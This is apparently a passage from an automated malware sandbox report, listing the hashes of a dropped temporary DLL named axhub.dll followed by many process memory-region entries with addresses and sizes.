                                                                                                                        fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                                                                                                                      • \Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                        MD5

                                                                                                                        1c7be730bdc4833afb7117d48c3fd513

                                                                                                                        SHA1

                                                                                                                        dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                        SHA256

                                                                                                                        8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                        SHA512

                                                                                                                        7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                      • memory/512-484-0x0000000000417E1A-mapping.dmp
                                                                                                                      • memory/652-668-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/748-144-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/796-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.5MB

                                                                                                                      • memory/796-145-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/796-148-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/796-151-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/796-154-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/796-134-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.1MB

                                                                                                                      • memory/796-133-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        152KB

                                                                                                                      • memory/796-131-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        572KB

                                                                                                                      • memory/796-117-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/964-278-0x0000028D5D180000-0x0000028D5D1F1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/964-424-0x0000028D5D200000-0x0000028D5D270000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        448KB

                                                                                                                      • memory/1008-421-0x00000133CCD20000-0x00000133CCD91000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1008-225-0x00000133CC560000-0x00000133CC5D1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1064-252-0x0000021D7A270000-0x0000021D7A2E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1064-419-0x0000021D7A360000-0x0000021D7A3D0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        448KB

                                                                                                                      • memory/1140-485-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1236-281-0x00000145B3CA0000-0x00000145B3D11000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1260-289-0x00000261A8860000-0x00000261A88D1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1272-149-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1368-280-0x00000235F9560000-0x00000235F95D1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1468-329-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1468-346-0x00000000009D0000-0x00000000009D1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1468-360-0x00000000052C0000-0x00000000052C1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1552-182-0x000001AFEE330000-0x000001AFEE39E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        440KB

                                                                                                                      • memory/1552-158-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1552-191-0x000001AFEE720000-0x000001AFEE7EE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        824KB

                                                                                                                      • memory/1764-159-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1764-215-0x0000000000400000-0x0000000002BF7000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40.0MB

                                                                                                                      • memory/1764-181-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        36KB

                                                                                                                      • memory/1768-478-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1824-287-0x0000018F53040000-0x0000018F530B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1840-169-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1872-297-0x0000000007940000-0x0000000007941000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1872-212-0x0000000006E70000-0x0000000006E98000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        160KB

                                                                                                                      • memory/1872-175-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1872-183-0x0000000000230000-0x0000000000231000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1872-233-0x00000000023A0000-0x00000000023A1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1908-664-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2212-675-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2260-340-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2260-366-0x0000000077C00000-0x0000000077D8E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.6MB

                                                                                                                      • memory/2260-384-0x0000000005CB0000-0x0000000005CB1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2268-338-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2268-404-0x0000000000BE0000-0x0000000000BEC000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        48KB

                                                                                                                      • memory/2336-413-0x0000023ABFEB0000-0x0000023ABFF20000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        448KB

                                                                                                                      • memory/2336-243-0x0000023ABF850000-0x0000023ABF8C1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2352-164-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2364-157-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2364-236-0x0000000000400000-0x0000000002C53000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40.3MB

                                                                                                                      • memory/2364-184-0x0000000002F10000-0x0000000002FAD000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        628KB

                                                                                                                      • memory/2376-235-0x000001565C440000-0x000001565C4B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2376-410-0x000001565C600000-0x000001565C670000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        448KB

                                                                                                                      • memory/2376-426-0x000001565C6E0000-0x000001565C751000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2452-341-0x0000000000460000-0x0000000000461000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2452-326-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2492-365-0x00000000059B0000-0x00000000059B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2492-319-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2492-345-0x0000000000FB0000-0x0000000000FB1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2496-187-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2496-206-0x0000000004E9C000-0x0000000004F9D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/2496-211-0x0000000004E00000-0x0000000004E5D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        372KB

                                                                                                                      • memory/2536-213-0x0000018121CD0000-0x0000018121D41000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2536-417-0x0000018122340000-0x00000181223B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2600-254-0x00000000001B0000-0x00000000001B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2600-285-0x0000000004FC0000-0x00000000055C6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        6.0MB

                                                                                                                      • memory/2600-242-0x0000000077C00000-0x0000000077D8E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.6MB

                                                                                                                      • memory/2600-200-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2624-295-0x0000024DE6610000-0x0000024DE6681000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2632-300-0x0000022E04A00000-0x0000022E04A71000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2676-407-0x0000000004318000-0x0000000004419000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/2676-393-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2740-114-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2764-288-0x00000000004E0000-0x00000000004F5000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        84KB

                                                                                                                      • memory/3080-150-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3084-387-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3112-425-0x0000000000417E1E-mapping.dmp
                                                                                                                      • memory/3112-147-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3156-177-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3156-216-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3156-226-0x0000000004880000-0x0000000004881000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3156-194-0x0000000000E00000-0x0000000000E01000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3156-189-0x0000000000620000-0x0000000000621000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3156-197-0x0000000000E10000-0x0000000000E1E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        56KB

                                                                                                                      • memory/3156-199-0x00000000098A0000-0x00000000098A1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3192-239-0x0000023506C00000-0x0000023506C4C000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        304KB

                                                                                                                      • memory/3192-411-0x0000023506F70000-0x0000023506FE1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/3192-250-0x0000023506CC0000-0x0000023506D31000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/3192-415-0x0000023506D40000-0x0000023506D8C000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        304KB

                                                                                                                      • memory/3268-143-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3568-146-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3624-504-0x0000000000417E0E-mapping.dmp
                                                                                                                      • memory/3668-660-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3684-674-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3736-142-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3736-570-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3792-363-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3824-339-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3828-153-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3896-670-0x0000000000424141-mapping.dmp
                                                                                                                      • memory/3928-318-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3928-354-0x00000000053B0000-0x00000000053B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3928-349-0x0000000005160000-0x0000000005161000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3928-343-0x0000000000910000-0x0000000000911000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4024-173-0x0000000000B70000-0x0000000000B71000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4024-163-0x0000000000610000-0x0000000000611000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4024-174-0x000000001B5F0000-0x000000001B5F2000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/4024-155-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4024-172-0x0000000000B50000-0x0000000000B6E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        120KB

                                                                                                                      • memory/4024-170-0x0000000000B40000-0x0000000000B41000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4040-328-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4040-356-0x0000000077C00000-0x0000000077D8E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.6MB

                                                                                                                      • memory/4040-382-0x0000000005280000-0x0000000005886000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        6.0MB

                                                                                                                      • memory/4044-223-0x0000000004CE0000-0x0000000004CF9000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/4044-247-0x0000000007270000-0x0000000007271000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4044-219-0x0000000007342000-0x0000000007343000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4044-188-0x00000000001C0000-0x00000000001EF000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        188KB

                                                                                                                      • memory/4044-237-0x0000000007220000-0x0000000007221000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4044-231-0x0000000007344000-0x0000000007346000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/4044-282-0x0000000007F20000-0x0000000007F21000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4044-234-0x00000000071F0000-0x00000000071F1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4044-166-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4044-255-0x0000000007340000-0x0000000007341000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4044-228-0x0000000007343000-0x0000000007344000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4044-248-0x0000000000400000-0x0000000002C10000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40.1MB

                                                                                                                      • memory/4044-230-0x0000000007850000-0x0000000007851000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4044-204-0x0000000004960000-0x000000000497B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        108KB

                                                                                                                      • memory/4112-273-0x0000000004E40000-0x0000000004E7E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        248KB

                                                                                                                      • memory/4112-291-0x0000000004EF0000-0x0000000004EF1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4112-202-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4112-224-0x0000000000620000-0x0000000000621000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4112-306-0x0000000008540000-0x0000000008541000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4160-314-0x0000023988900000-0x0000023988A06000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/4160-210-0x00007FF7CC9C4060-mapping.dmp
                                                                                                                      • memory/4160-313-0x0000023986090000-0x00000239860AB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        108KB

                                                                                                                      • memory/4160-222-0x0000023986200000-0x0000023986271000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/4176-361-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4200-546-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4208-397-0x0000000000402F68-mapping.dmp
                                                                                                                      • memory/4236-355-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4428-327-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4484-308-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4496-320-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4500-663-0x0000000000424141-mapping.dmp
                                                                                                                      • memory/4504-500-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4516-241-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4516-283-0x000000000E1A0000-0x000000000E1A1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4516-294-0x0000000004B30000-0x0000000004B31000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4632-357-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4680-259-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4680-265-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        340KB

                                                                                                                      • memory/4716-401-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4744-364-0x0000000000540000-0x000000000068A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.3MB

                                                                                                                      • memory/4744-362-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/4744-353-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4856-389-0x0000000000417E2A-mapping.dmp
                                                                                                                      • memory/5100-667-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5104-321-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5104-385-0x000001C74CE00000-0x000001C74CE70000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        448KB

                                                                                                                      • memory/5108-405-0x0000000003FD0000-0x00000000040D1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/5108-402-0x0000000000000000-mapping.dmp